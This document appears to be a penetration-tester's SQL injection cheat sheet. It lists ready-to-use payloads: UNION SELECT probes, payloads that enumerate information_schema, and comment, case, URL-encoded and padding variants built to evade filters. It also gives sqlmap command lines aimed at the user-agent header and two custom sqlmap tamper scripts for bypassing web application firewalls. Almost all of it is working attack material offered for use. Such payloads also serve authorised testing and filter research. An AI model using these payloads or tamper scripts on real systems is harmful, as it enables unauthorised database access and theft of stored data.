SQL

Quick Payloads

' UNION SELECT user(); -- -
' or 'elscustom'='elsFALSE
' or 'elscustom'='elscustom
'/**/UNION/**/SELECT/**/@@version;#
'UNION(select('PoC String'));#'union(SELECT(group_concat(table_name))FROM(information_schema.columns)where(table_schema=database()));#
'union(SELECT(group_concat(column_name))FROM(information_schema.columns)where(table_name='secretcustomers'));#
"UNION(select('PoC String'));#
"union(SELECT(group_concat(table_name))FROM(information_schema.columns)where(table_schema=database()));#
' UNiOn seLect @@versiOn;#
' uZEROFILLnZEROFILLiZEROFILLoZEROFILLnZEROFILL ZEROFILLsZEROFILLeZEROFILLlZEROFILLeZEROFILLcZEROFILLt ZEROFILL@@ZEROFILLvZEROFILLeZEROFILLrZEROFILLsZEROFILLiZEROFILLoZEROFILLnZEROFILL; ZEROFILL-- ZEROFILL-ZEROFILL
%61%61%61%61%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%40%40%76%65%72%73%69%6f%6e%3b%20%2d%2d%20%2d
%25%36%31%25%36%31%25%36%31%25%36%31%25%32%37%25%32%30%25%37%35%25%36%65%25%36%39%25%36%66%25%36%65%25%32%30%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%34%30%25%34%30%25%37%36%25%36%35%25%37%32%25%37%33%25%36%39%25%36%66%25%36%65%25%33%62%25%32%30%25%32%64%25%32%64%25%32%30%25%32%64
') uZEROFILLnZEROFILLiZEROFILLoZEROFILLn sZEROFILLeZEROFILLlZEROFILLeZEROFILLcZEROFILLt 'PoC'; -- -

SQLMap Payloads

sqlmap -u 'http://vulnerablehost/' -p user-agent --random-agent --banner
sqlmap -u 'http://vulnerablehost/' -p user-agent --user-agent=elsagent --technique=B --banner
sqlmap -u 'http://vulnerablehost/' -p user-agent --random-agent --technique=U --tamper=space2comment --suffix=';#' --union-char=els --banner
sqlmap -u 'http://vulnerablehost/' -p user-agent --tamper=charencode --technique=U --banner
sqlmap -u 'http://vulnerablehost/' -p user-agent --tamper=chardoubleencode --technique=U --banner
sqlmap -u 'http://vulnerablehost/' -p user-agent --technique=U --tamper=/path/to/your/tampering/scripts/fill.py --prefix="notexistant')" --suffix="; -- " --union-char=els --banner

SQLMap Tamper Scripts

Custom;

----------------------------
Camelcase.py
----------------------------
#!/usr/bin/env python
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
def dependencies():
pass
def tamper(payload, **kwargs):
"""
Replaces each keyword a CaMeLcAsE VeRsIoN of it.
>>> tamper('INSERT')
'InSeRt'
"""
retVal = str()
if payload:
for i in xrange(len(payload)):
if (i % 2 == 0):
# We cannot break 0x12345
if not ((payload[i] == 'x') and (payload[i-1] == '0')):
retVal += payload[i].upper()
else:
retVal += payload[i]
else:
retVal += payload[i].lower()
return retVal
[+] SQLMAP Payload [+]
sqlmap -u 'http://vulnerablehost/' -p user-agent --technique=U --tamper=/path/to/your/tampering/scripts/camelcase.py --prefix="nonexistent'" --suffix=';#' --union-char=els --banner
---------------------------
Zerofill.py
----------------------------
#!/usr/bin/env python
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
def dependencies():
pass
def tamper(payload, **kwargs):
"""
Insert FILL after every character
>>> tamper('INSERT')
'IfillNfillSfillEfillRfillTfill
"""
retVal = str()
FILL='ZEROFILL'
if payload:
for i in xrange(len(payload)):
retVal += payload[i]+FILL
# Uncomment to debug
# print "pretamper:", payload
return retVal
[+] SQLMAP Payload [+]
sqlmap -u 'http://vulnerablehost/' -p user-agent --technique=U --tamper=/path/to/your/tampering/scripts/fill.py --banner